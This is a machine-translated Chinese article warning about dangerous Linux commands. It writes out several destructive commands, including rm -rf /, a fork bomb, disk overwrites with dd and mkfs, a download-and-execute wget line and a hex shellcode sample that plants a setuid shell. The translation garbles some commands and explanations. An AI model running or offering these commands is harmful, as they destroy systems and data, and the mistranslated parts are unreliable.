最危險的命令 - 你永遠(yuǎn)不應(yīng)該在 Linux 上運行它們
命令行界面是管理 Linux 系統(tǒng)的強(qiáng)大而簡單的工具。它提供了一種快速、靈活的方式來運行系統(tǒng),特別是在管理沒有圖形界面的無頭系統(tǒng)時。
雖然這些代碼對于管理系統(tǒng)很有用,但它充滿了風(fēng)險。執(zhí)行錯誤的命令可能會對您的計算機(jī)造成不可逆轉(zhuǎn)的損壞。在本指南中,我們編譯了一些您不應(yīng)考慮在計算機(jī)上運行的最危險的命令。
1. rm -rf/命令
rm 命令是一個 Linux 命令,用于根據(jù)所使用的參數(shù)刪除文件和文件夾。但是,在使用 rm 命令時必須格外小心,因為一個小的拼寫錯誤或錯誤可能會導(dǎo)致不可恢復(fù)的系統(tǒng)損壞。
當(dāng)使用該選項以 root 身份運行時,該命令將從Linux 文件層次結(jié)構(gòu)配置中最高的-rf /根目錄恢復(fù)系統(tǒng)上的所有文件和文件夾。(/)簡而言之,rm -rf /該命令會完全擦除您的系統(tǒng),從而導(dǎo)致系統(tǒng)損壞且無法恢復(fù)。
與 rm 命令一起使用的選項包括。
他們使用的詞語
Linux 中的 rm 命令用于刪除文件。
rm -r 命令會重復(fù)刪除文件夾,甚至是空文件夾。
rm -f 命令刪除“僅讀取文件”而不提示。
rm -rf/:強(qiáng)制刪除根目錄中的所有內(nèi)容。
rm -rf * :強(qiáng)制刪除當(dāng)前文件夾/工作目錄中的所有內(nèi)容。
rm -rf 的 . :單擊刪除現(xiàn)有文件夾和子文件夾。
的
事實上,如果您以普通用戶身份運行該命令,您將在終端上收到兩個警告。
要解決通過“rm”命令意外刪除文件的問題,請在“\.bashrc”文件中將“rm”命令別名為“rm -i”,要求您確認(rèn)任何刪除操作。
2. :(){:|:&};:命令
上面其實就是叉子炸彈。它的工作原理是:創(chuàng)建一個名為 create 的函數(shù),該函數(shù)調(diào)用自身兩次,一次在前臺,一次在后臺。該進(jìn)程重復(fù)執(zhí)行,并在此過程中消耗所有系統(tǒng)資源,導(dǎo)致系統(tǒng)崩潰。
命令炸彈實際上是一種特定類型的 DoS(拒絕服務(wù))攻擊。也稱為 Wabbit 或 Rabbit 病毒。最糟糕的是,您不必成為 root 即可發(fā)起此攻擊。
值得慶幸的是,您可以通過將本地用戶的操作限制為 4000 個用戶來保護(hù)自己免受此攻擊。
您可以通過運行以下命令來執(zhí)行此操作:
$ 來自 -S -u
您可以稍后使用以下命令驗證這一點:
$ ulimit -u
3.命令> /dev/sda
當(dāng)您執(zhí)行后跟 with 的命令時>/dev/sda,它將覆蓋/dev/sda硬盤驅(qū)動器上的塊。該塊包含文件系統(tǒng)數(shù)據(jù),覆蓋時會導(dǎo)致無法恢復(fù)的系統(tǒng)損壞。
4.mv目錄/dev/null
您不應(yīng)嘗試的另一個破壞性任務(wù)是打開/dev/null. /dev/null文件是一種特殊類型的文件,稱為空設(shè)備或“黑洞”。被劍奪走的一切/dev/null都會被丟棄并摧毀。
以下命令將用戶主目錄的所有內(nèi)容移動到/dev/null,從而轉(zhuǎn)儲用戶主目錄中的所有數(shù)據(jù)
# 等 /home/user/* /dev/null
5. wget http://malicious_source -O- | wget http://malicious_source -O- | 提供
wget 命令是從 Web 或文件服務(wù)器下載文件的命令。上述命令從惡意位置提取腳本然后執(zhí)行。
6. mkfs.ext3 /dev/sda
mkfs 命令在隨機(jī)存儲設(shè)備(大多數(shù)情況下是硬盤驅(qū)動器的分區(qū))上創(chuàng)建新的文件系統(tǒng)(ext2、ext3、ext4 等)。在分區(qū)上運行 mkfs 命令會刪除其中存儲的所有數(shù)據(jù)。
雖然在配置磁盤分區(qū)時很有用,但配置整個驅(qū)動器(例如 mkfs.ext3 /dev/sda)會導(dǎo)致系統(tǒng)崩潰并使其處于不可恢復(fù)的狀態(tài)。發(fā)生這種情況是因為它破壞了附加到您的數(shù)據(jù)的所有系統(tǒng)文件。
該命令還可以采用其他形式,如下所示。
# mkfs.ext4 /dev/sda
# mkfs.xfs /dev/sda
# mkfs.btrfs /dev/sda
7. > 文件命令
>file 刪除文件的內(nèi)容并將其留空。它與 cat /dev/null > file 命令同義。因此,在 Linux 系統(tǒng)上執(zhí)行新指令時應(yīng)小心謹(jǐn)慎。
下面演示了該命令如何覆蓋文本文件。您可以想象如果該命令包含的文件是配置文件,該命令將導(dǎo)致災(zāi)難。
8.^foo^bar
^foo^bar該代碼既危險又有用,具體取決于它的實現(xiàn)方式。雖然它允許您編輯和重新執(zhí)行以前執(zhí)行的命令,但如果您在執(zhí)行命令之前忽略對命令所做的更改,則可能會造成很大的破壞。
9. dd if =/dev/random of =/dev/sda
上述命令刪除/dev/sda塊并隨機(jī)向該塊寫入壞數(shù)據(jù)。您的系統(tǒng)將處于不一致且不可恢復(fù)的狀態(tài)。
10.Chmod -R 777/。
雖然它可能不會立即破壞您的 Linux 系統(tǒng),但chmod -R 777 /該命令會從根目錄恢復(fù) Linux 系統(tǒng)上所有文件的所有權(quán)限(讀取、寫入和執(zhí)行)。
這實際上向所有用戶公開了所有重要的配置文件和其他文件,這給您的系統(tǒng)帶來了嚴(yán)重的安全風(fēng)險。任何懷有惡意的人都可以輕松修改重要文件并使您的系統(tǒng)崩潰。
11. 隱藏的命令
下面的命令只不過是上面的第一個命令(rm -rf)。這里的代碼以十六進(jìn)制隱藏,以欺騙毫無戒心的用戶。如果您在終端中運行以下代碼,它將刪除您的根分區(qū)。
此命令表示威脅有時可能是隱藏的并且本質(zhì)上不可見。你需要知道你在做什么以及結(jié)果會是什么。不要編譯/執(zhí)行來自未知來源的代碼。
char esp[] __attribute__((section(“.text”))) /* esp
發(fā)布 */
=“\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68′′
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99′′
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7′′
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56′′
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31′′
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69′′
“\x6e\x2f\x73\x68\x00\x2d\x63\x00′′
“cp -p /bin/sh /tmp/.beyond; 修改4755
/tmp/.beyond;”;
注意:請勿在 Linux 終端或 shell 或朋友或?qū)W校計算機(jī)上運行上述任何命令。如果您想測試它們,請在虛擬機(jī)上使用它們。
由于執(zhí)行上述命令而導(dǎo)致的任何不一致或數(shù)據(jù)丟失都將破壞您的訂單,文章作者和 Tecmint 均不承擔(dān)任何責(zé)任。
目前為止就這樣了。我很快就會帶著你們會喜歡閱讀的另一篇有趣的文章回來。在那之前,請繼續(xù)關(guān)注并連接到 Howtoing。
如果您知道任何其他此類危險 Linux 命令并希望我們將它們添加到列表中,請通過評論部分告訴我們,并且不要忘記分享您的關(guān)鍵字。